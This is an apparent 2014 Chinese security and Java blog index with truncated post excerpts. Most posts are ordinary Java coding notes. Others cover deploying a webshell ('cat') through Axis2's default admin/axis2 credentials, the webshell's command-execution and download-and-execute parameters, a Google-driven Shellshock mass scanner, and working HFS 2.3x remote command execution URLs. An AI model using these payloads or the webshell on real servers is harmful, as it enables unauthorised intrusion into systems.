2014-11-12 16:02:44

axis2 利用小工具cat.aar

Axis2: Web Service是现在最适合实现SOAP的技术,而Axis2是实现Web Service的一种技术框架(架构)。 昨天把把菜刀脚本打包发现<>在xml会被转义,导致菜刀客户端无法连接。看起来别人可以修改response类型,但是我没成功。利用之前发的Cat小工具打包成aar就可以玩了。 axis2管理登陆默认配置了用户名为admin,密码axis2: axis2管理后台: 想要deploy 自己的应用需要先打成对应的aar、jar包。用eclipse安装axis2插件。 Service Archive Wizard - Eclipse Plug-in 、Code Generator Wizard - Eclipse Plug-in 下载地址:https://axis.apache.org/axis2/java/core/tools/index.html 下载完成后直接把对应的jar丢到eclipse的dropins目录就行了。 新建一个java项目,写好相关脚本。 导出aar: 安装完成后新建Axis2 service Archiver项目,当然可以根据自己的需求可以利用Axis2 code generator生成wsdl文件。 指定class file为此项目编译目录。 wsdl可以自动生成或者load已生成的wadl文件,可以跳过。Add any

2014-11-05 23:58:37

cat小工具

我觉得这都算不上什么webshell了,写这个只是为了简化一些操作。cat提供了简单的的文件遍历、管理、命令执行、反弹shell、文件下载、自动下载并执行这么几个小功能。 web界面只是一个简单的文件目录浏览功能和文件下载功能: 点击文件名可以编辑对应的文件,新建文件也可以在这里进行File地址写上需要编辑的文件绝对路径就行了: 执行系统命令会比较麻烦,因为需要自己写参数了: 请求:http://localhost:8080/Struts2/cat.jsp?action=exec&cmd=ifconfig 参数: action=exec cmd=需要执行的命令。 文件下载分为远程文件下载和本地文件下载。本地文件下载直接点击下载即可从服务器上下载对应的文件。而远程文件下载的则需要继续以参数的方式请求: 请求:http://localhost:8080/Struts2/cat.jsp?action=downloadL&url=http://www.baidu.com/img/bdlogo.png&path=bdlogo.png 参数: action=downloadL url=需要下载的文件的URL地址 path=文件保存的绝对路径,注意如果只写文件名会下载到当前运行环境的目录下(比如tomcat会下载到tomcat的bin目录)。 本地文件下载如遇到目录则自动

2014-11-05 10:50:54

JavaSwing JComboBox模拟html的select标签

JComboBox默认不支持name属性设置,getSelectedItem()默认返回的是String。实际上可以模仿原生的DefaultComboBoxModel实现一个自己的DefaultComboBoxModel。 DefaultComboBoxModel.java package org.javaweb.swing.ui; import java.util.Vector; import javax.swing.AbstractListModel; import javax.swing.ComboBoxModel; /** * 实现默认ComboBoxModel * * @author yz */ public class DefaultComboBoxModel extends AbstractListModel implements ComboBoxModel { private Object selectedItem; Vector<JComboBoxItem> objects; public DefaultComboBoxModel(Vector<JComboBoxItem> objects) { this.objects = objects; } @Override p

2014-10-10 10:48:55

JavaSwing 简单模拟Mac Finder

为了方便切换,我把Panel和JFrame分开了。之前画了个用的Netbeans,但是感觉毕竟没有手写的方便扩展。 NetBeans画的: 代码写的: MainFrame.java: package org.javaweb.burp.test; import java.awt.Dimension; import javax.swing.JFrame; /** * * @author yz */ public class MainFrame extends JFrame { private static final long serialVersionUID = 1L; public MainFrame() { initComponents(); } private void initComponents() { setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE); this.setTitle("测试"); this.add(new ApplicationPanel()); int screenWidth = java.awt.Toolkit.getDefaultT

2014-10-07 12:55:15

[Bug更新]Java 反射JDBC ResultSet自动映射成对应实体

[更新]:修复了查询字段映射bug,导致结果集数量=字段*字段数问题。ls.add(c);应该放到for (int i = 1; i < rsm.getColumnCount() + 1; i++) {}外面。 以前一直用Spring的JdbcTemplate查询数据,JdbcTemplate被封装的及其简单易用。某些时候不太适合使用Spring这样庞大的框架,所以自己封装了个JDBC查询的自动映射类以备后用。实现了一个简单的映射数据库表到实体类数组。 TableMapping.java: /* * Copyright yz 2016-01-14 Email:[email protected] * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agr

2014-09-25 12:34:05

CVE-2014-6271 google 批量

import java.io.IOException; import java.net.URLDecoder; import java.util.Queue; import java.util.concurrent.LinkedBlockingQueue; import java.util.regex.Matcher; import java.util.regex.Pattern; import org.jsoup.Connection; import org.jsoup.Jsoup; import org.jsoup.nodes.Document; import org.jsoup.nodes.Element; import org.jsoup.select.Elements; public class Test extends Thread{ Queue<String> strQeueu = new LinkedBlockingQueue<String>(); public Test(Queue<String> strQeueu){ this.strQeueu = strQeueu; } public static String getResponse(String url) throws IOException{ tr

2014-09-23 16:53:47

JDBCTest 命令行下自动load外部数据库驱动并执行SQL语句

保存为JDBCTest.java并编译:javac JDBCTest.java 执行:java JDBCTest com.mysql.jdbc.Driver jdbc:mysql://localhost/test root 123456 "select version()" 参数的顺序是驱动包、url、用户名、密码、sql语句。执行结果: [[email protected]:~]$ java JDBCTest com.mysql.jdbc.Driver jdbc:mysql://localhost/test root 123456 "select version()" version()[VARCHAR] 5.6.19 (JDBCTest.java会加载外部的驱动包,所以如果能出外网无需考虑是否存在对应的数据库驱动包) JDBCTest.java源码: import java.io.BufferedReader; import java.io.InputStreamReader; import java.lang.reflect.Method; import java.net.URL; import java.net.URLClassLoader; import java.sql.DriverManager; import java.sql.ResultSet;

2014-09-21 17:50:46

URLClassLoader 加载外部jar获取 JarFile(HTTP)问题(JarURLConnection)

当通过URLClassLoader去load一个外部的jar(HTTP)后获取这个jar实体对象会有一点小问题。正常情况下: URL u = getClass().getProtectionDomain().getCodeSource().getLocation(); 即可获取到当前的jar路径,因为是URLClassLoader所以这里拿到的URI可能是HTTP协议。即:http://xxx.com/xxx.jar。这个时候如果: JarURLConnection juc = (JarURLConnection) new URL(name).openConnection(); 无法从HttpURLConnection转为JarURLConnection: java.lang.ClassCastException: sun.net.www.protocol.http.HttpURLConnection cannot be cast to java.net.JarURLConnection API中给出的Demo: 一个JAR实体: jar:http://www.foo.com/bar/baz.jar!/COM/foo/Quux.class 一个JAR文件 jar:http://www.foo.com/bar/baz.jar!/ 一个JAR目录 jar:http://www.foo.

2014-09-14 01:36:32

[转] HFS 2.3x 远程命令执行

从某论坛看见的,转载部分: 这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的。 测试部分: 百度搜HFS默认就是2.3x版本,执行echo测试成功: http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.} google hack了一下,发现一个抓鸡黑阔: 。。。。。。 已测试官方最新版,一样存在。 撒旦: 测试某表弟的抓鸡服务器同样XXOO了。。 带回显的HFS利用方法,抛砖引玉 http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20whoami>1.txt.}{.cookie|2|value={.load|1.txt.}.}

2014-09-09 22:55:04

servlet http异常

response.sendError可以自定义当前页面http错误状态,HttpServletResponse定义了常规的HTTP错误状态码。例如给浏览器返回一个403错误: public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { response.sendError(HttpServletResponse.SC_FORBIDDEN, "禁止使用GET请求."); } HTTP Status 403 - 禁止使用GET请求. type Status report message 禁止使用GET请求. description Access to the specified resource (禁止使用GET请求.) has been forbidden. Apache Tomcat/7.0.29